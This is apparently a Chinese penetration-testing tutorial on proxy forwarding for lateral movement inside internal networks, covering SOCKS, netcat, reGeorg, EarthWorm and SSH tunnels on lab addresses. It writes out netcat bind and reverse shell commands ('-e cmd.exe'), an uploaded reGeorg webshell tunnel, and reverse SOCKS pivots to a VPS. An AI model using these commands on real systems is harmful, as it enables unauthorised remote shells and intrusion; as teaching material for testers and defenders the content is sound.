内网渗透之代理转发

内网渗透之代理转发

内网渗透 酒仙桥六号部队 [img](javascript:void(0))

2020-09-09 8,815

这是 酒仙桥六号部队 的第 36 篇文章。

全文共计3447个字,预计阅读时长12分钟。

1 前言

谈到内网转发,在我们日常的渗透测试过程中经常会用到端口转发,可以利用代理脚本将内网的流量代理到本地进行访问,这样极大的方便了我们对内网进行横向渗透。

那为什么不直接通过登陆服务器来对内网中其他机器进行渗透,而是通过内网转发呢?意义何在呢?

img

因为…

大部分时候拿到权限不够,无法直接登录。

而且如果在内网服务器中进行操作,我们需要上传工具进行很多操作,如果服务器缺少对应的环境变量或者组件,会导致渗透受阻。

而且直接远程登录会留下比较明显的痕迹。

因此内网转发是我们最好的选择,在本地进行操作是最方便的,也比较安全~~~

说这么多,不知道大家有没有听过"代理"这个词,这个东西和我们要说的内网转发有很大的关系~

2 正向和反向代理

那接下来咱们唠一下什么是正向/反向代理?

正向代理中,Proxy和Client同属一个区域,对Server是透明的;反向代理中,Proxy和Server同属一个区域,对Client透明。但其实这不管是正向还是反向代理都有一个共同的特点,都是代替收发请求和响应,不过从结构上来看正好左右互换了下,所以把前者那种代理方式叫做正向代理,后面那个玩意叫做反向代理。

img

2.1正向代理(Forward Proxy)

img

Lhost- ->proxy-->Rhost

Lhost为了访问到Rhost,向proxy发送了一个请求并且指定目标是Rhost,然后proxy向Rhost转交请求并将获得的内容返回给Lhost,简单来说正向代理就是proxy代替了我们去访问Rhost。

2.2反向代理(Reverse Proxy)

img

Lhost<—>proxy<—>firewall<—>Rhost

和正向代理相反(废话),一般情况下,防火墙肯定不能让外网机器随便访问地访问内网机器,所以就提出反向代理。

Lhost只向proxy发送普通的请求,具体让他转到哪里,proxy自己判断,然后将返回的数据递交回来,这样的好处就是在某些防火墙只允许proxy数据进出的时候可以有效的进行穿透。

img

简单区分

正向代理的是客户端,反向代理的是服务端,可以理解为正向代理是就比如年少时期喜欢那个Ta,当时很羞涩需要我自己(Lhost)写一份信(proxy)去告诉Ta,反向代理就是喜欢的那个Ta(Rhost)知道并且主动(proxy)过来告诉自己(Lhost)。

有人要问了,代理本质又是基于什么"何方神圣"呢?

那就是Socks协议~~

3 Socks协议

什么是Socks协议??

中文意思:防火墙安全会话转换协议,工作在OSI参考模型的第5层(会话层)。

img

它是一种可以穿透防火墙的协议,很多场景都会用到。比如Fan墙,你们懂得~~

因为Socks介于传输层与表示层之间,使用TCP协议传输数据,因而不提供如传递ICMP信息之类的网络层相关服务。

目前有两个版本:SOCKS4和SOCKS5

SOCKS4支持TELNET、FTPHTTP等TCP协议;

SOCKS5支持TCP与UDP,并支持安全认证方案。

Ps: Socks不支持ICMP,不能使用ping命令。。记住哦~~~

当然啦,基于socks的转发代理有很多的实用的小工具,少侠看图吧~

常见的转发工具及不同平台的代理链工具:

img

这些工具能对我们内网横向渗透产生什么效果呢?接下来就开始进行一波模拟实战吧~

img

4 Natcat

让我们的神器出手–瑞士**,也叫NC,小巧强悍,主要作用就是用来反弹shell。

主机A:192.168.153.138

主机B:192.168.153.140

正向连接

在主机A执行nc -l -p 5555 -t -e cmd.exe

-t是通过telnet模式执行 cmd.exe 程序,可以省略。

img

在主机B执行nc -nvv 192.168.153.138 5555:

img

反向连接

在主机B监听nc -lp 5555:

img

在主机A反弹nc -t -e cmd 192.168.153.140 5555:

img

5 reGeorg+Proxychains

reGeorg是reDuh的升级版,主要是把内网服务器的端口通过http/https隧道转发到本机。

1.上传reGeorg的tunnel.jsp到web主机A。访问链接,并转发到本地端口。

img

主机B以python环境运行:

python reGeorgSocksProxy.py -p 1080 -u http://192.168.153.137/tunnel.jsp

img

使用设置proxychains的代理端口,进行访问,一般配合nmap和metasploit进行后续内网渗透。

Ps:socks4版本协议不支持udp和icmp协议,所以使用nmap要加上-sT -Pn即使用tcp协议且不使用icmp协议。

img

6 Earthworm+Proxychains

EW 是一套便携式的网络穿透工具,具有SOCKSv5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。

该工具能够以"正向"、“反向”、"多级级联"等方式打通一条网络隧道,直达网络深处,用蚯蚓独有的手段突破网络限制,给防火墙松土。

支持 Linux、Windows、MacOS、Arm-Linux 均被包括其内,强烈推荐使用。

img

该工具借用了 ssocks 和 lcx.exe 的操作逻辑,并进行更多的功能强化。

目前工具提供六种链路状态,可通过 -s 参数进行选定,分别为:

ssocksd rcsocks rssocks

lcx_slave lcx_tran lcx_listen

其中 SOCKS5 服务的核心逻辑支持由 ssocksd 和 rssocks 提供,分别对应正向与反向socks代理。

其余的 lcx 链路状态用于打通测试主机同 socks 服务器之间的通路。

lcx 类别管道:

lcx_slave 该管道一侧通过反弹方式连接代理请求方,另一侧连接代理提供主机。

lcx_tran 该管道,通过监听本地端口接收代理请求,并转交给代理提供主机。

lcx_listen 该管道,通过监听本地端口接收数据,并将其转交给目标网络回连的代理提供主机。

通过组合lcx类别管道的特性,可以实现多层内网环境下的渗透测试。

6.1 正向SOCKS5服务器

当目标网络边界存在公网IP且可任意开监听端口:

./ew_for_Win.exe -s ssocksd -l 8888

img

上述命令是在该机器(192.168.153.140)开启一个8888的正向连接端口。

然后其它主机可通过设置代理为192.168.153.140:8888添加这个代理,这里使用的是proxychains。

img

6.2 反弹SOCKS5服务器

当目标网络边界不存在公网IP,通过反弹方式创建socks代理。

先在一台具有公网 ip 的主机A上运行以下命令:

./ew_for_linux64 -s rcsocks -l 1080 -e 8888

img

意思是在我们公网VPS上添加一个转接隧道,把1080端口收到的代理请求转交给8888端口。

在目标主机B上启动SOCKS5服务 并反弹到公网主机的8888端口:

ew_for_Win.exe -s rssocks -d 192.168.153.129 -e 8888

img

本地主机(192.168.153.129)然后通过添加公网192.168.153.129:1080这个代理,来访问内网机器(192.168.153.129)

当然如果本地主机如果是公网ip,就可以把在公网执行的步骤放在本地执行即可。

img

6.3 二级网络环境(有公网IP)

假设我们获得了右侧A主机和B主机的控制权限,A主机配有2块网卡,一块10.129.72.168连通外网,一块192.168.153.140只能连接内网B主机,无法访问内网其它资源。B主机可以访问内网资源,但无法访问外网。

img

先上传ew到B主机,利用ssocksd方式启动8888端口的SOCKS代理,命令如下:

ew_for_Win.exe -s ssocksd -l 8888

然后在A主机执行:

ew_for_Win.exe -s lcx_tran -l 1080 -f 192.168.153.138 -g 8888

img

含义是将1080端口收到的代理请求转交给B主机(192.168.153.138)的8888端口。

然后MyPc就可以通过A的外网代理10.129.72.168:1080访问B。

img

6.4 二级网络环境(无公网IP)

假设我们获得了右侧A主机和B主机的控制权限,A主机(NAT)没有公网IP,也无法访问内网资源。B主机可以访问内网资源,但无法访问外网。

img

这次操作有四步:

1.在公网vps(45.xxx.xxx.72)添加转接隧道,将10800端口收到的代理请求转交给8888端口;

./ew_for_linux64 -s lcx_listen -l 10800 -e 8888

img

2.B主机(192.168.153.138)主机正向开启8888端口;

./ew_for_Win.exe -s ssocksd -l 9999

img

3.A主机利用lcx_slave方式,将公网VPS的888端口和B主机的999端口连接起来;

./ew_for_Win.exe -s lcx_slave -d 45.xxx.xxx.72 -e 8888 -f192.168.153.138 -g 9999

img

4.现在MyPC可通过访问45.xxx.xxx.72:10800来使用192.168.153.138主机提供的socks5代理,代理成功,vps会有rssockscmd_socket OK!提示。

img

img

7 ssh隧道代理转发

ssh有三个强大的端口转发命令,分别是本地转发、远程转发、动态转发。

socks代理:

ssh -qTfnN -D port remotehost

参数详解:

-C 允许压缩数据

-q 安静模式

-T不占用 shell

-f 后台运行,并推荐加上 -n 参数

-N不执行远程命令

-g允许远端主机连接本地转发的端口

-n把 stdin 重定向到 /dev/null (防止从 stdin 读取数据)

-L port:host :hostport 正向代理

//将本地机(客户机)的某个端口转发到远端指定机器的指定端口

-R port:host :hostport 反向代理

//将远程主机(服务器)的某个端口转发到本地端指定机器的指定端口

-D port socks5代理

//指定一个本地机器 “动态” 应用程序端口转发。

7.1 ssh本地转发

远程管理服务器上的mysql,mysql不能直接root用户远程登陆。这时候就可以通过本地转发,通过ssh将服务器的3306端口转发到本地1234端口实现以root用户远程登陆mysql。

ssh -CfNg -L <本机地址>:<本机端口>:<目标B地址>:<目标B端口>用户名@跳板IP(A)

ssh -CfNg -L 1234:127.0.0.1:3306 root@45.XX.XX.X21

img

7.2 ssh远程转发

内网的服务器,外网不能直接访问,使用远程转发,将内网的服务器端口转发到外网端口。这时候访问外网的端口,就可以直接访问到了内网的端口。

ssh -CfNg -R <本地端口>:<目标B地址>:<目标B端口> 用户名@本地IP

ssh -CfNg -R 81:127.0.0.1:80 root@192.168.153.142

img

现在在192.168.153.142访问127.0.0.1:81就是访问内网的服务器的80端口。

img

7.3 ssh动态转发

远端服务器有限制隔离,本地主机无法直接访问,需要将一台可以访问远端服务器的主机作为跳板,设置为代理端,来代理访问不能访问的资源。

ssh -qTfnN -D <本地端口> 用户名@跳板IP(A)

ssh -qTfnN -D 1080 root@45.XX.XX.X21

img

本地Proxychains配置socks4 127.0.0.1:1080。

img

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/42972.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

反向代理神器 Nginx Proxy Manager 群晖Docker部署

群晖Docker部署 本文将使用 NginxProxyManager 中文版 介绍NginxProxyManager基于群晖Docke的部署方法&#xff0c;并且所有操作均在群晖网页端完成&#xff0c;不需要命令行操作&#xff0c;非常适合新手。 GitHub&#xff1a;xiaoxinpro/nginx-proxy-manager-zh Docker&…

谈一谈正向代理和反向代理

前言 小编在公司的技术分享中多次听到正向代理和反向代理&#xff0c;对于Ngnix这一实现反向代理的服务器&#xff0c;是如何工作的呢&#xff1f;下面咱们就一起了解一下。 正文 什么是代理服务器&#xff08;Proxy Serve&#xff09;&#xff1f; 提供代理服务的电脑系统或其…

反向代理神器——Nginx Proxy Manager

不知道Nginx的小伙伴可以先看一看这篇博文Nginx教程通俗易懂 前言 对于不会配置 Nginx 的小伙伴 Nginx Proxy Manager 可以像宝塔面板一样的UI界面轻松的管理端口转发&#xff0c;完成反向代理的设置和SSL证书的部署。 对于喜欢写配置的同学可以使用 &#x1f449;nginxconf…

ssh反向代理实现内网穿透【亲测可用】

常用内网穿透方式 1、网卡层映射&#xff0c;包括购买公网ip 推荐指数&#xff1a;&#x1f44d;&#x1f3fb;&#x1f44d;&#x1f3fb;&#x1f44d;&#x1f3fb;&#x1f44d;&#x1f3fb;&#x1f44d;&#x1f3fb;。 缺点&#xff1a;主要申请困难。 2、自己搭建内网…

内网代理转发工具

目录 概念区分 端口转发端口映射代理隧道端口转发工具 概念讲解 socket端口转发socks代理两者的异同端口转发常用工具 msf反弹木马lcxportmapssh端口转发iptables 端口转发firewall 端口转发socks代理工具 基于web服务的socks5工具 reGeorgTunna能够进行多层代理的工具 Earthwo…

【玩转Docker】【02】反向代理神器 — Nginx Proxy Manager

一、安装 Nginx Proxy Manager 1、创建安装目录 screen # 启动screen会话,防止安装中途 SSH 连接断开&#xff0c;导致安装失败。sudo -i mkdir -p /root/data/docker_data/npm cd /root/data/docker_data/npm# screen -r # 重新连接之前的会话# exit …

一款开源网络转发、代理软件,解决跨网通信问题

一直比较懒&#xff0c;没有为开源事业做出过什么贡献&#xff0c;最近痛定思痛&#xff0c;写了一个开源软件&#xff0c;解决网络通信问题&#xff0c;附上github地址&#xff0c;供大家共同交流。 https://github.com/wsrf16/anchor 1.功能介绍 本软件针对跨区、跨网段等网…

苹果AppleGPT要来了!市值猛增710亿美元

点击下方卡片&#xff0c;关注“CVer”公众号 AI/CV重磅干货&#xff0c;第一时间送达 点击进入—>【计算机视觉】微信交流群 白交 发自 凹非寺转载自&#xff1a;量子位&#xff08;QbitAI&#xff09; 苹果AppleGPT来了&#xff01; 彭博社爆料&#xff0c;公司正在创建自…

10大超好用ai软件,2023办公学习必备!

人工智能 (AI) 近年来取得了显着进步&#xff0c;并已成为科技行业的流行语。我们随时能看到大量个关人工智能工具的资讯&#xff0c;它有可能自动执行任务&#xff0c;节省时间并提高效率&#xff0c;使其成为企业的宝贵资产和平台。 随着人工智能的进步&#xff0c;旨在让企…

文心一言,站在奥林匹亚

1932年7月&#xff0c;在洛杉矶举办的第10届夏季奥林匹克运动会上&#xff0c;一个只有几人组成&#xff0c;运动员仅1人的代表团完成了注册参赛。他们经历了无尽的辗转波折&#xff0c;漫长的海上漂泊&#xff0c;最终来到了奥运赛场上&#xff0c;他们来自——中国。 来到赛场…

Google I/O 2023 全球开发者大会 Reveal Event

目录 When is Google I/O 2023? 谷歌 I/O 2023 是什么时候? Is Google I/O in person? 谷歌I/O是亲自吗?

王小川新AI公司浮出水面:成立「五季智能」,召集搜狗旧部,水下估值接近独角兽...

鱼羊 发自 凹非寺量子位 | 公众号 QbitAI 前搜狗CEO王小川的AI新公司&#xff0c;正式浮出水面。 公司名为五季智能。 企查查信息显示&#xff0c;公司股东为王小川和茹立云。 后者是王小川的老朋友&#xff0c;在搜狗创业初期就和王小川合作&#xff0c;并曾任搜狗COO&#xf…

AutoGPT的出现,会让程序员失业吗?

最近&#xff0c;一个叫AutoGPT的模型火了&#xff0c;在GitHub上线数周Star数就直线飙升。截至目前&#xff0c;AutoGPT的Star数已经达到87k&#xff0c;马上接近90k&#xff0c;超过了PyTorch的65k。 根据AutoGPT的命名&#xff0c;就可以发现其神奇之处在于“auto”&#x…

4月11号软件资讯更新合集......

跟 ChatGPT 聊天、需求润色优化&#xff0c;禅道 OpenAI 插件发布&#xff01; 禅道插件上新了&#xff0c;OpenAI 禅道集成&#xff0c;可提供神奇海螺聊天、需求润色功能。 神奇海螺 “章鱼哥&#xff0c;你为什么不问问神奇海螺呢&#xff1f;”—— 海绵宝宝 那么&…

ChatLaw团队招实习生啦!真格基金的创业、投资与AI详细指南;远程工作的8个安全法则;游戏开发者的数学教程 | ShowMeAI日报

&#x1f440;日报&周刊合集 | &#x1f3a1;生产力工具与行业应用大全 | &#x1f9e1; 点赞关注评论拜托啦&#xff01; &#x1f916; 北大 ChatLaw 团队招聘实习生&#xff0c;开放算法和前后端岗位 ChatLaw 是一个开源的中文法律大模型&#xff0c;由北京大学与北大-兔…

实现自动化部署前端项目,从安装Jenkins到部署完成的整体配置 --适合初学Jenkins、想实现或者学习自动化部署的同学,知识点比较全面,过程写的清晰

前言 一、什么是Jenkins 二、Jenkins安装配置 Linux环境安装JDK Linux环境安装Maven Linux安装Jenkins 启动Jenkins jenkins配置 配置汉化版的jenkins 安装gitHub插件 gitHub配置 jenkins的配置 jenkins的gitHub配置 jenkins的java环境配置 小总结 两种情况 第…

顶级数学家玩股票胜过巴菲特 被人建议改行(图)

曾获得世界数学界最高荣誉的西蒙斯&#xff0c;转做投资以后&#xff0c;比巴菲特做得还好 国庆长假之后&#xff0c;中国股民惊喜地发现&#xff0c;股市仿佛重新被唤醒一般&#xff0c;短短几日&#xff0c;股指势如破竹&#xff0c;数次高开高走。股市又开始火了&#xff0c…

【量化】用数据验证巴菲特推荐的指数定投的收益真相

作者&#xff1a;幻好 来源&#xff1a; 恒生LIGHT云社区 最近几年&#xff0c;越来越多的年轻人开始接触基金&#xff0c;购买基金定投理财&#xff0c;本文将通过数据验证指数定投是否真的有效。 背景简述 1993年巴菲特在《致投资者的信》中首次提到了他的建议&#xf…

评温斯坦的炒股书(非常重要,常看看)

http://blog.sina.com.cn/s/blog_674caeca0101dlgq.html 技术分析的经典书籍&#xff0c;就我个人的观点而言&#xff0c;技术分析书籍多数是浪费时间和误人子弟的&#xff0c;纯粹技术分析的书籍不可多读。但我现在要强烈推荐一本技术分析的经典书籍&#xff1a;《史丹温斯坦称…

股神巴菲特

股神巴菲特&#xff1a;5岁开始做生意&#xff0c;11岁开始炒股 沃伦巴菲特1930年出生在美国西部一个叫做奥马哈的小城。他出生的时候&#xff0c;正是家里最困难的几年。父亲霍华德巴菲特投资股票血本无归&#xff0c;家里生活非常拮据&#xff0c;为了省下一点咖啡钱&#xf…